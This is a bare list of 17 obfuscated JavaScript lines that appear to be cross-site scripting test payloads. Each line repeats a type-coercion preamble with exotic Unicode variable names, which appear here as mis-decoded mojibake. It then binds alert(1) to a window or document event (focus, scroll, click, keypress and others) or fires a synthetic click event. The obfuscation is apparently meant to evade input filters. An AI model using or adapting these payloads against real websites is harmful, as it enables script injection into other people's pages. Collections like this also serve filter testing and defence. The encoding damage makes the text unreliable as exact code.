ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],window.onfocus=function(){alert(1)}
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],window.onblur=function(){alert(1)}
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],window.onresize=function(){alert(1)}
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],window.onscroll=function(){alert(1)}
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],document.onclick=function(){alert(1)}
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],document.ondblclick=function(){alert(1)}
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],document.onmousedown=function(){alert(1)}
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],document.onmouseup=function(){alert(1)}
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],document.onmouseover=function(){alert(1)}
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],document.onmouseout=function(){alert(1)}
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],document.onkeydown=function(){alert(1)}
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],document.onkeyup=function(){alert(1)}
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],document.onkeypress=function(){alert(1)}
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],document.addEventListener('click',function(){alert(1)})
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],document.attachEvent('onclick',function(){alert(1)})
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],e=new Event('click');document.dispatchEvent(e);alert(1)
ğ’€€='',ğ’€=!ğ’€€+'',ğ’€‚=!!ğ’€€+'',ğ’€ƒ={}+'',ğ’€„=ğ’€‚[0],ğ’€…=ğ’€‚[1],ğ’€†=ğ’€‚[2],ğ’€‡=ğ’€‚[3],ğ’€ˆ=ğ’€‚[4],ğ’€‰=ğ’€[0],ğ’€Š=ğ’€[1],ğ’€‹=ğ’€[2],e=document.createEvent('Event');e.initEvent('click',true,true);document.dispatchEvent(e);alert(1)
